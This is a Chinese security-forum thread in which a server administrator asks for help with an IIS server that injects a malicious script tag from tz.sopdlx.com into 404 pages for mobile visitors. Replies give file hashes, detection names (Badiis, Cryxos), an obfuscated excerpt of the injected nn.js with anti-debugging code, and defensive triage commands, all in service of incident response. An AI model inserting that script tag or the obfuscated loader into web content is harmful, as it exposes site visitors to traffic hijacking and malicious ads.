吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 168|回复: 26
收起左侧

求助阿里云IIS 全站访问不存在的页面(404)时,在手机 UA 下被注入恶意脚本

[复制链接]
Ym0081gg 发表于 2026-8-20 13:52
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Ym0081gg 于 2026-8-20 15:11 编辑

- 操作系统:Windows Server 2012 R2 数据中心版 64位中文版- Web 服务器:IIS 6.0问题描述:1. 现象:访问服务器上任意网站的不存在页面(返回 404),如果使用手机浏览器或模拟手机 User-Agent,响应中会被注入如下恶意脚本:   <script src="https://tz.sopdlx.com/nn.js"></script>   而使用桌面浏览器 User-Agent 访问,响应正常(404 无脚本注入)。   示例请求:http://gz-qsfw.cn/xxxxx(手机 UA 返回 200 并带脚本,桌面 UA 返回 404 无脚本)。2. 影响范围:服务器上所有 IIS 站点均受影响,不是单个网站问题。3. 已排查内容:    已收集的日志文件:   - Failed Request Tracing 日志:C:\inetpub\logs\FailedReqLogFiles\W3SVC21\fr000046.xml(包含恶意脚本 Buffer 事件) https://wwaly.lanzouq.com/iBGj343lqtih (这是日志文件)
   <EventData>  <Data Name="ContextId">{8001EECF-0002-7200-B63F-84710C7967BB}</Data>  <Data Name="Buffer"><script src="https://tz.sopdlx.com/nn.js"></script></Data> </EventData>




新发现大概率是篡改了这个文件(C:\Windows\System32\inetsrv\custerr.dll),有懂的大佬可以看下
https://wwaly.lanzouq.com/im28l43mj9xg

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

AI-Compare 发表于 2026-8-24 14:18
Ym0081gg 发表于 2026-8-24 12:15
https://wwaly.lanzouq.com/i9GQd44an98j
这是系统诊断一键诊断的分析报告 火绒没查出来异常

服务器病毒排查分析报告

一、基本信息

项目
操作系统 Microsoft Windows Server 2012 R2 Datacenter(版本 6.3.9600)
主机名 *****(阿里云ECS)
CPU/内存 Intel Xeon Platinum **** / ***GB RAM
数据采集时间 2026-08-24 11:54:13 开始,监控时长 5 分钟
用户声称感染 Cryxos / Trojan.Win64.Badiis
压缩包内容 服务、启动项、驱动、活动进程、网络连接、进程活动日志、设备树、环境变量、已安装软件、诊断报告 共 13 份文本

二、总体结论

结论:在本份火绒剑导出的样本中,未发现 Cryxos / Trojan.Win64.Badiis 的典型痕迹;当前系统中没有明显的活跃恶意进程、伪装服务或异常持久化项。

但服务器存在极高风险的弱配置与陈旧软件,且IIS 80/443端口直接对外暴露并与若干公网IP建立了HTTP连接,已符合BadIIS等SEO黑帽劫持类恶意软件常见的"入侵后跳板"特征——建议结合网页源代码、web.config、IIS全局模块做更深入排查(本样本未导出这些内容)。


三、针对 Cryxos / BadIIS 的专项核查

3.1 Cryxos 家族典型特征与对照

Cryxos(即所谓"Cryxos特洛伊木马")常见行为:

  • 弹出伪造技术支持诈骗弹窗、伪造BSOD
  • 创建随机名EXE于 %AppData%%Temp%%ProgramData%
  • 写入 HKCU\...\Run 注册表自启动
  • 伪装成 system.exeserver.exeservice.exeupdate.exe
  • 劫持浏览器快捷方式、注入浏览器进程

核查结果

  • 启动项(启动项.txt)仅见火绒(HipsTray.exe / HRShell.dll)、WinRAR、Notepad++、Google Chrome,未发现任何无公司名/无签名的Run项或计划任务。
  • 未发现 AppData/Temp/ProgramData/Recycler/Public 等异常目录下的可执行文件加载。
  • 5分钟监控窗口内仅发生 2 次进程创建(WmiPrvSE.exe 和火绒自身SecTask.exe),均为正常系统/安全软件行为,未见 cmd.exe/powershell.exe/mshta.exe/cscript.exe/rundll32.exe/bitsadmin 等异常子进程派生。
  • 网络外连全部为阿里云内网管控地址(100.100.x.x 为阿里云DNS/NTP/云盾/云助手内网段)及已装软件的合法域名,未发现去陌生C2的连接。

3.2 BadIIS(Bad IIS / SEO劫持)典型特征与对照

根据Cisco Talos 2026年披露,BadIIS针对IIS服务器,核心特征:

  • 向IIS写入一个伪装的ISAPI筛选器/全局模块DLL,常位于 inetsrv 或站点目录
  • 持久化方式为Windows服务,常伪装成系统服务名(如 FaxService / AudioSrv / UpdateSvc 等)
  • 劫持HTTP流量,向搜索引擎蜘蛛返回赌博/色情内容,对普通用户做JS跳转
  • 使用Base64+单字节XOR混淆C2地址
  • 常伴随磁盘上存在带 "demo.pdb" 调试路径字符串的DLL
  • 运行时加载于 w3wp.exe 进程中

核查结果

(1) w3wp.exe(IIS工作进程)加载模块检查

w3wp.exe 实际加载的非系统DLL仅有两类:

模块 路径 厂商 判断
log4cplus_For_Plugin.dll、SPModule.dll、WPCPlugin.dll、sd_engine.dll 等 C:\Program Files (x86)\SafeDog\SafeDogSiteIIS\ safedog.cn(安全狗·互联网安全实验室) 安全狗IIS防护组件,正常
ISAPI_Rewrite.dll C:\Program Files\Helicon\ISAPI_Rewrite3\ Helicon Tech Helicon ISAPI_Rewrite 3(URL重写),已安装软件清单中存在,正常
vtchisapi50.dll、vt_chi_hui16.dll ***:\VW\VT\Hui\M16-SAPI5\lib\ Voiceware Corp. NeoSpeech "VW 慧"中文TTS语音合成引擎的SAPI5 ISAPI接口,已安装软件清单中有 Microsoft Speech SDK 5.1/语音包,属于合法语音库,非恶意
.NET Framework 相关 C:\Windows\Microsoft.NET\Framework\v2.0.50727\ Microsoft 系统组件,正常
asp.dll、custerr.dll、gzip.dll、webengine.dll 等 inetsrv 目录 Microsoft IIS内置组件,正常

未发现 位于inetsrv目录、公司名空白/伪造、名称无意义的可疑ISAPI DLL;未发现名称与BadIIS已知家族(如 iis64.dlliis32.dllnet.dllconfig.dllupdate.dll 等)匹配的模块。

(2) 服务项检查

逐项比对服务.txt(共171项服务):

  • 未见伪装为 FaxService / FaxSvc / AudioService 等系统服务名的恶意服务
  • 正在运行的服务中,非Microsoft服务只有:
    • 火绒(HipsDaemon / HipsTray / HipsMain)——2026-08-18安装,正常安全软件
    • AliYunDun / AliYunDunUpdate / AliyunService(阿里云云盾/云助手/ArgusAgent)——阿里云ECS标准组件
    • SafeDog(安全狗,若安装)——对应目录为 SafeDogSiteIIS
    • SQL Server (MSSQLSERVER) 等SQL相关服务
  • 服务可执行路径均指向合法安装目录,未发现指向Temp/AppData/ProgramData的服务项。

(3) 驱动检查

  • 已加载内核驱动中磁盘过滤驱动仅见 hrdevmon.sys火绒磁盘监控,签名为Beijing Huorong Network Technology)。
  • 其他非微软驱动为 vrtaucbl.sys(Eugene Muzychenko,Virtual Audio Cable虚拟声卡驱动,与已装的"Virtual Audio Cable 4.10"对应)、阿里云相关驱动、Red Hat VirtIO虚拟化驱动,均为合法驱动。
  • 未发现无签名、无公司名、异常路径的rootkit驱动。

(4) 监听端口

端口 进程 用途 风险评估
TCP 80 System(内核层,实为IIS 80端口监听) IIS HTTP 对外服务端口
TCP 443 System IIS HTTPS 对外服务端口
TCP 1433 sqlservr.exe MSSQL Server 已绑定0.0.0.0,存在弱口令/爆破风险(内网建议限源)
TCP 1519 svchost.exe(TermService) 远程桌面RDP 已见公网IP ********* 建立RDP连接
TCP 1801/2103/2105 mqsvc.exe MSMQ消息队列 正常IIS配套服务
UDP 123/500/4500/5355 svchost.exe NTP/IKEv2/LLMNR 标准系统服务

w3wp.exe(PID 8804)已与外部地址 ********:4391 建立了一条ESTABLISHED连接,源端口61223——这是客户端发起的出站HTTP返回流量(属于外部用户访问IIS时的连接),非恶意外联。

(5) 对外网络连接(5分钟监控窗内)

所有NET_connect事件目标IP分类如下:

目标IP段 归属 用途
****:53 阿里云内网DNS 正常DNS解析
****:80 / ****:3128 阿里云云监控(Argus/cms-cloudmonitor) 云监控上报
****:80/443 阿里云云助手(service.axt.aliyuncs.com) 云助手心跳
**** / ****:443 阿里云云盾(AliHips.exe/AliYunDun) 云安全中心通信
****、****.x / ****.x:123 NTP时间同步 正常
****:123 公网NTP 正常
****、****:80 火绒SecAnalysis云端分析 正常

HTTP请求仅见 argusagent 上报指标到 metrichub-cn-shenzhen.aliyuncs.com、云助手心跳到 service.axt.aliyuncs.com——未发现可疑的C2通信、挖矿矿池连接、黑链外联


四、发现的异常/可疑点(按风险等级)

虽然未在样本中直接找到Cryxos/BadIIS样本,但发现多项高风险配置与异常痕迹,值得重点关注:

🔴 高风险

1. SQL Server 2008 直接监听 0.0.0.0:1433,且为SQL Server 2008 R2 RTM版本(10.53.6000.34)

  • SQL Server 2008/R2 已在2019年7月结束扩展支持,无安全补丁;该服务器为2019年安装后长期未升级。
  • 结合外部3389(1519端口映射的RDP)已有公网IP(******,广东电信移动网络)建立连接,MSSQL弱口令爆破+RDP爆破是该服务器最可能的入侵路径,也是BadIIS最常见的入侵方式之一。
  • 建议:① 立即检查SQL Server是否有弱口令/未授权登录;② 在阿里云安全组限制1433/1519源IP;③ 尽快升级到SQL Server 2016+或迁移RDS。

2. IIS 80/443端口对外服务且存在多站点(G盘存在web目录)

  • 已见来自公网(**** 四川电信、**** 江苏电信、****、**** 广东)访问80/443端口的连接。
  • G盘挂载了数据盘,且存在 ***:\VW\VT\Hui\M16-SAPI5\(语音库),说明 *** 盘同时部署了Web业务与其他软件——Web目录位于数据盘是BadIIS等IIS劫持型木马常见的隐藏位置
  • 建议:① 用 %windir%\system32\inetsrv\appcmd.exe list module 列出全部IIS全局模块和托管模块,核对是否有未知DLL;② 打开IIS管理器检查所有站点的"ISAPI筛选器"、"处理程序映射"、"模块"是否有未签名项;③ 检查各站点web.config中是否有异常 <httpModule>/<httpHandler> 注入;④ 全盘搜索近30天内修改时间异常的 .dll 文件,重点排查站点bin目录和inetsrv目录。

3. Google Chrome 版本为 92.0.4515.131(2021年7月版本)

  • 浏览器严重过期,存在大量已知漏洞,但服务器上一般不应安装Chrome用于日常浏览——若管理员曾在服务器上用Chrome下载运行过不明程序,会成为感染入口。

🟡 中风险

4. 火绒安全软件为事后安装(2026-08-18即6天前)

  • 监控时火绒处于运行状态,但安装时间只有6天,说明是在怀疑中毒后才补装的安全软件,恶意软件可能已在安装前落地并具备对抗火绒的能力(或已被火绒隔离)。
  • 建议查看火绒的隔离区日志,检查2026-08-18\~2026-08-24期间是否有拦截/查杀记录。

5. 存在"防伪DLL 1.1(广州黑码软件)"与"Virtual Audio Cable 4.10"

  • "防伪DLL"属于商业软件授权保护组件,来源广州黑码,本身不是恶意软件,但这类授权DLL常被破解补丁/注册机投毒。
  • Virtual Audio Cable(vrtaucbl.sys驱动已加载)是虚拟音频设备,常被用于远程桌面/录屏场景,但也有远控木马滥用其做麦克风监听/回放——需结合业务确认是否必要。

6. 天翼云盘客户端安装

  • 云盘类客户端会同步本地文件到云端,若服务器已被入侵,可能成为数据外传通道。

🟢 低风险/需关注

7. 服务中存在若干已停止但配置为"自动"的可疑历史服务

  • vminit service(阿里云云盘初始化服务)已停止但为自动启动,正常。
  • Windows Update(wuauserv)为手动且已停止——服务器长期不打补丁(这与#1风险相呼应)。

8. 已安装 ****++ 6.7.9.2(2015年版本)、WinRAR 5.71(2019版本)均严重过期

  • WinRAR<5.80 存在著名的ACE路径穿越漏洞(CVE-2018-20250),曾被大量APT/木马用于投递,建议立即升级到最新版。

9. 磁盘上存在额外200GB/210GB/50GB三块VirtIO数据盘

  • 设备树显示挂载了三块数据盘(200GB+210GB+50GB),但样本未给出数据盘上的文件列表,IIS站点内容极可能部署在这些数据盘上,需重点核查站点bin目录、上传目录是否有asp/aspx一句话木马

五、建议的进一步排查步骤

由于火绒剑导出的这份快照没有包含磁盘文件列表、IIS配置、web.config、W3C日志、计划任务详细项、临时目录文件等关键证据,无法100%排除已经潜伏但当时未激活的恶意组件。建议按以下顺序继续排查:

  1. 检查IIS全局模块/ISAPI筛选器(最关键)

    %windir%\system32\inetsrv\appcmd list module /config:*\
    %windir%\system32\inetsrv\appcmd list config -section:isapiFilters

    比对每个模块DLL的数字签名,任何无签名/签名异常的DLL都应上传Virustotal检测。

  2. 检查站点web.config

    • 在所有站点根目录、上级目录、C:\inetpub\wwwroot\web.configC:\Windows\System32\inetsrv\config\applicationHost.config 中搜索:
      • <httpModule>/<module> 中指向不在白名单的DLL
      • <httpHandler>/<handler> 中异常的脚本映射
      • 被注入的JS(<script>标签)或加密的 <appSettings>
      • 可疑的反序列化/ViewState配置
  3. 全盘搜索最近修改的可疑文件

    Get-ChildItem -Path C:\,G:\ -Include *.dll,*.exe,*.aspx,*.asp,*.js -Recurse -ErrorAction SilentlyContinue |\
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) } |\
    Sort-Object LastWriteTime -Descending | Select-Object FullName,LastWriteTime,Length

  4. 检查计划任务

    schtasks /query /fo LIST /v > C:\tasks.txt

    排查是否有以Update/Service/TaskMachine/GoogleUpdate伪装的计划任务。

  5. 检查注册表启动项

    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\SYSTEM\CurrentControlSet\Services 下ImagePath指向异常路径的服务
  6. 核查SQL Server与RDP登录日志

    • 在事件查看器中排查安全日志中是否有大量4625(登录失败)/4624(登录成功)事件,确认是否已被暴力破解成功。
  7. 火绒全盘查杀+离线查杀

    • 使用火绒安全软件做一次"全盘查杀"(不要选快速查杀),并建议下载**火绒Sword(独立ARK工具)**或PCHunter查看是否有内核钩子被篡改(本次仅见火绒自身的hrdevmon磁盘钩子)。

六、证据来源

  • /home/user/*******/analysis/extracted/ 下解压的13个文本文件
  • 活动进程.txt 共90个进程块,逐一比对模块签名与路径
  • 进程活动日志-1.txt 共10584条事件(REG_setval 8775、EXEC_module_load 1031、NET_httpin 591、NET_connect 100、NET_dnsreq 55、NET_http 25、EXEC_create 2、REG_rmval 1、EXEC_destroy 3)
  • 服务.txt 171项服务
  • 驱动.txt 262项驱动
  • 启动项.txt 150行,包含登录自启动、资源管理器插件、计划任务、ImageHijack等
  • 网络.txt 82行监听/连接条目
  • 已安装软件.txt 32款已安装程序
AI-Compare 发表于 2026-8-20 21:12
本帖最后由 AI-Compare 于 2026-8-20 21:14 编辑

服务器进行全盘杀毒,将整站源文件拷贝至新电脑/虚拟机IIS内重建
重建后问题是否能复现,如果依旧能复现,则源码可能已被嵌入恶意代码

如果不能复现,则问题可能出现在系统,软件,漏洞,读写权限,未鉴权后门等
如果是多台集群,请立即对所有集群全盘查杀,警惕更深入横向感染或勒索窃密

域 名 sopdlx[.]com
注册商 Gname.com Pte. Ltd.
注册人
邮 箱
地 区 中国(CN)
注册日 2025-09-10 07:52:39 UTC+8
过期日 2028-09-10 07:52:39 UTC+8
更新日 2026-05-07 21:03:38 UTC+8
IANA_ID 1923
状 态 客户端禁止转移
DNS  johnny[.]ns.cloudflare[.]com
    sue[.]ns.cloudflare[.]com
DNSSEC 未配置

文件指纹
custerr.dll
大小: 449536 字节 : 439 KiB
CRC32: 98A2895D
CRC64: 7DADC00AE5A1ECA2
XXH64: CFD79389A191D796
SHA256: 140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
SHA3-256: 48312f71646fe12a7ea94d374381ba46065c6118f36a1b90abfbedde3aaa24fc

nn.js
大小: 130093 字节 : 127 KiB
CRC32: AF7AEF4D
CRC64: 94385E424F5E87E8
XXH64: 238E5778B2BA740C
SHA256: 09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
SHA3-256: cbe1ca077b53d82dc667e05a1a1762fbcfdde5309a91fd4f11b0ede2b14750f6

参考病名

custerr.dll
Trojan.Win64.Badiis

nn.js
JS:Trojan.Cryxos.14530

基础信息

x64 Microsoft Visual C++ v14.44 - 2025 - (DLL 4889..24)  - no sec. Cab.7z.Zip [ Win Vista ] - EXP only 1 : RegisterModule , 

调试符号
No PDB

编译时间
2026-05-23

修改时间
2009-07-14 09:41

转义类型

十六进制
\x67\x67\x52\x64

运行提示

nn.js:1:62081

该代码已使用 VMencryption.com.core 进行高强度加密保护

console[_0x37864b(680, '%Dcc')](
  _0x37864b(1342, '66Bo') + _0x15bdcc(829, 'eh&f') + _0x244b7a(1382, 'NP2a') + _0x244b7a(1401, 'kxbH') + _0x15bdcc(1339, 'Ro!%') + _0x244b7a(1022, 'V8cY') + _0x15bdcc(581, '^Um5'),
  _0x46f389(620, 'BwIg') + _0x244b7a(586, '6cA]') + _0x15bdcc(776, 'P%cK') + _0x244b7a(822, 'eh&f') + _0x15bdcc(1347, '[U3g') + _0x244b7a(1025, '^Um5') + _0x2861a7(800, 'G)Jr') + _0x2861a7(712, 'aQul')
),

异常格式

{_0xefc29b=_0xefc29b

多种未闭合类括弧,无法自动简易格式化

反制调试

function anonymous(
) {
debugger
}

样式预览

function _0x199d() {
  var _0x40be33 = [
    'ggRdL8kVW54q',
    'WPLLW6lcHmkrDq',
    .....
    'sCkwW5GTCq'
  ];
  _0x199d = function () {
    return _0x40be33;
  };
  return _0x199d();
}

var _0x37864b = _0xce42,
_0x15bdcc = _0xce42,
.....
_0x113f95 = _0xce42;

function _0xce42(_0xefc29b, _0x2fea5c) {
  _0xefc29b = _0xefc29b - (6292 + - 1958 * 1 + - 3999);
  var _0x486847 = _0x199d();
  var _0x58557e = _0x486847[_0xefc29b];
  if (_0xce42['QHghct'] === undefined) {
    var _0x300346 = function (_0x4e1bad) {
      var _0x1c928c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
      var _0x3d529f = '',
      _0x41e067 = '',
      _0x3b0985 = _0x3d529f + _0x300346;
      for (
        var _0x38457b = 7538 + 8162 + - 15700,
        _0x3b7043,
        _0x3653a3,
        _0x2c42a8 = - 1 * 7299 + - 5147 + 254 * 49;
        _0x3653a3 = _0x4e1bad['charAt'](_0x2c42a8++);
        ~_0x3653a3 &&
        (
          _0x3b7043 = _0x38457b % ( - 29 * - 307 + 2191 + - 11090) ? _0x3b7043 * (6362 + - 6402 + 104) + _0x3653a3 : _0x3653a3,
          _0x38457b++ % (8291 + - 7287 + 125 * - 8)
        ) ? _0x3d529f += _0x3b0985['charCodeAt'](_0x2c42a8 + ( - 781 * - 10 + - 8536 + 32 * 23)) - ( - 47 * 203 + - 4555 * - 2 + 441) !== - 7647 * - 1 + - 5673 + - 21 * 94 ? String['fromCharCode'](
          6283 * 1 + - 59 * 83 + 29 * - 39 & _0x3b7043 >> (
            - ( - 2213 + - 248 * - 1 + 7 * 281) * _0x38457b & - 9544 + 94 * 87 + - 343 * - 4
          )
        ) : _0x38457b : - 4950 + - 1 * 9939 + 7 * 2127
      ) {
        _0x3653a3 = _0x1c928c['indexOf'](_0x3653a3);
      }
      for (
        var _0x227036 = - 1 * - 3749 + 1558 + - 183 * 29,
        _0x4cba68 = _0x3d529f['length'];
        _0x227036 < _0x4cba68;
        _0x227036++
      ) {
        _0x41e067 += '%' + (
          '00' + _0x3d529f['charCodeAt'](_0x227036) ['toString'](1 * - 4739 + 74 * - 127 + - 1 * - 14153)
        ) ['slice']( - (7180 + - 477 + - 6701 * 1));
      }
      return decodeURIComponent(_0x41e067);
    };

.....

AI分析

该脚本经过高度混淆,核心功能是检测用户环境并动态注入广告或劫持页面行为。

1. 环境检测
移动设备识别:通过正则匹配 navigator.userAgent,检测是否为手机/平板(mobi|android|iphone...)。
页面嵌入检测:检查是否在 <iframe> 中运行(window.top !== window.self),若在 iframe 内则可能不执行或执行不同逻辑。
开发者工具检测:利用 debugger 语句、函数 toString 正则匹配等方式,检测是否打开控制台,若检测到调试行为则可能进入死循环或改变流程。

2. DOM 动态注入
创建隐藏元素:生成 <div>、<style>、<iframe> 等元素,并设置样式(如 display:none、visibility:hidden)以隐藏界面。
加载外部资源:通过 <iframe> 的 src 属性或动态创建的 <script> 加载第三方内容(可能为广告或重定向页面)。
修改样式:注入 CSS 规则,可能用于隐藏原有页面元素或覆盖点击区域。

3. 事件监听与交互劫持
监听用户操作:添加 click、touchstart 等事件,在用户点击时触发回调。
定时轮询:使用 setInterval 反复检查环境状态或执行特定动作(如加载广告、更新页面内容)。
延迟执行:通过 setTimeout 延迟执行关键函数,以绕过某些页面加载时的检测。

4. 反调试与防分析
无限循环/递归:_0x1d06e6 函数中存在递归调用,可能用于消耗 CPU 或干扰调试器。
混淆字符串:所有字符串均通过自定义解密函数动态还原,增加静态分析难度。
检查函数上下文:利用 Function.prototype.toString 检测是否被篡改,以识别调试环境。

推测意图
该脚本极可能是一个广告加载器或流量劫持脚本,用于:
在目标页面中注入不可见的广告或弹窗,获取展示收益。
通过点击劫持(Clickjacking)诱导用户点击隐藏链接。
检测到调试环境时避免暴露真实行为,以绕过安全分析。
由于代码被混淆,具体加载的 URL 或广告平台无法直接提取,但其整体结构符合常见的恶意广告脚本特征。运行此脚本的页面可能会被植入非法广告、重定向或收集用户行为数据。

本回答由 AI 生成,内容仅供参考,请仔细甄别

脚本网址
https://s.threatbook.com/report/url/e188ad90f344caa9d0458f8f6898646a

custerr.dll
https://virusscan.jotti.org/zh-CN/filescanjob/2q6qx0bsb6
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjgyNzkyZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAfAgkUmTITNisANm-W
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=187cd28a6111814c4396db6127c8d6d2
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=187cd28a6111814c4396db6127c8d6d2
https://www.virscan.org/report/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://www.virustotal.com/gui/file/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://s.threatbook.com/report/file/140f0439c44aaa1615e0399b2d7607168cd976534557fce51b856c7b43f5ef85
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=50182971c8a702a11ce66ffa500f34fc&sk=63509342
https://opentip.kaspersky.com/140F0439C44AAA1615E0399B2D7607168CD976534557FCE51B856C7B43F5EF85/results?tab=upload

nn.js
https://virusscan.jotti.org/zh-CN/filescanjob/w6zrb2tix1
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMjgyOTI2ZHNmYXNkZmFzZGY=/
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaAfK09gmTITNisANm-i
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=7abe3a93a155124b0ef1947e66095ccd
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=7abe3a93a155124b0ef1947e66095ccd
https://www.virscan.org/report/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://www.virustotal.com/gui/file/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://s.threatbook.com/report/file/09bb5433ffa2e61f3080a4080d797600520997daf0a99e9da6713f984d0d9864
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=08afb2c663d6ebfb33a5def0edd975d5&sk=43551541
https://opentip.kaspersky.com/09BB5433FFA2E61F3080A4080D797600520997DAF0A99E9DA6713F984D0D9864/results?tab=upload

 楼主| Ym0081gg 发表于 2026-8-20 16:18
C:\Windows\System32\inetsrv\config\applicationHost.config 里面有个这个配置
  <httpErrors lockAttributes="allowAbsolutePathsWhenDelegated,defaultPath">
            <error statusCode="401" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="401.htm" />
            <error statusCode="403" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="403.htm" />
            <error statusCode="404" prefixLanguageFilePath="" path="/404" responseMode="ExecuteURL" />
            <error statusCode="405" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="405.htm" />
            <error statusCode="406" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="406.htm" />
            <error statusCode="412" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="412.htm" />
            <error statusCode="500" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="500.htm" />
            <error statusCode="501" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="501.htm" />
            <error statusCode="502" prefixLanguageFilePath="%SystemDrive%\inetpub\custerr" path="502.htm" />
        </httpErrors>
这个404 估计就是原因,但是改回静态的话 也只是表面看着没事 不知道根源在哪儿
 楼主| Ym0081gg 发表于 2026-8-20 16:36
Ym0081gg 发表于 2026-8-20 16:18
C:\Windows\System32\inetsrv\config\applicationHost.config 里面有个这个配置
  
            

最新情况是还原了custerr.dll和<error statusCode="404" prefixLanguageFilePath="" path="/404" responseMode="ExecuteURL" /> 但是依然没用
 楼主| Ym0081gg 发表于 2026-8-21 09:38
AI-Compare 发表于 2026-8-20 21:12
[md]服务器进行全盘杀毒,将整站源文件拷贝至新电脑/虚拟机IIS内重建
重建后问题是否能复现,如果依旧 ...

多谢大佬,非常感谢,杀毒我试过火绒 但是没有查出来,有没有推荐的杀毒软件
AI-Compare 发表于 2026-8-21 09:56
Ym0081gg 发表于 2026-8-21 09:38
多谢大佬,非常感谢,杀毒我试过火绒 但是没有查出来,有没有推荐的杀毒软件

目前火绒卡巴暂未入库暂无人工反馈,所以未检出
至于服务器用啥杀毒软件查杀率好,其实我也没准
 楼主| Ym0081gg 发表于 2026-8-21 09:58
AI-Compare 发表于 2026-8-21 09:56
目前火绒卡巴暂未入库暂无人工反馈,所以未检出
至于服务器用啥杀毒软件查杀率好,其实我也没准

那不凉了  重装系统代价好大,维护时间也好久
AI-Compare 发表于 2026-8-21 10:08
Ym0081gg 发表于 2026-8-21 09:58
那不凉了  重装系统代价好大,维护时间也好久

目前建议维持原述,先排查源码有没有洞,如果源码有洞
那么即使重装好系统,那也依然会重蹈覆辙,被黑产挂马

可以本地虚拟机重建测试,如果本地虚拟机重建404正常
则按序排查,意思是当房间出现蟑螂,则屋内可能群已驻扎

服务器进行全盘杀毒,将整站源文件拷贝至新电脑/虚拟机IIS内重建
重建后问题是否能复现,如果依旧能复现,则源码可能已被嵌入恶意代码

如果不能复现,则问题可能出现在系统,软件,漏洞,读写权限,未鉴权后门等
如果是多台集群,请立即对所有集群全盘查杀,警惕更深入横向感染或勒索窃密
 楼主| Ym0081gg 发表于 2026-8-21 10:11
AI-Compare 发表于 2026-8-21 10:08
[md]目前建议维持原述,先排查源码有没有洞,如果源码有洞
那么即使重装好系统,那也依然会重蹈覆辙,被 ...

好,我打算先下个eset 试下 不行就虚拟盘排查下吧
AI-Compare 发表于 2026-8-21 10:20
本帖最后由 AI-Compare 于 2026-8-21 10:26 编辑
Ym0081gg 发表于 2026-8-21 10:11
好,我打算先下个eset 试下 不行就虚拟盘排查下吧

你的公司域名是有备案的,对于黑产而言,这就是白名单香饽饽
先尝试通过白名单规则,限制访问正常200网页以外所有内容

如果黑产利用该挂马网页,在微信/QQ等多个私域内投流或传火
很容易进平台网址黑名单,或普通人因公司域名下黑产投诉到管局

参考
https://mp.weixin.qq.com/s/FA0okxISmwfamqOEPRUiHQ
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-8-25 09:27

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表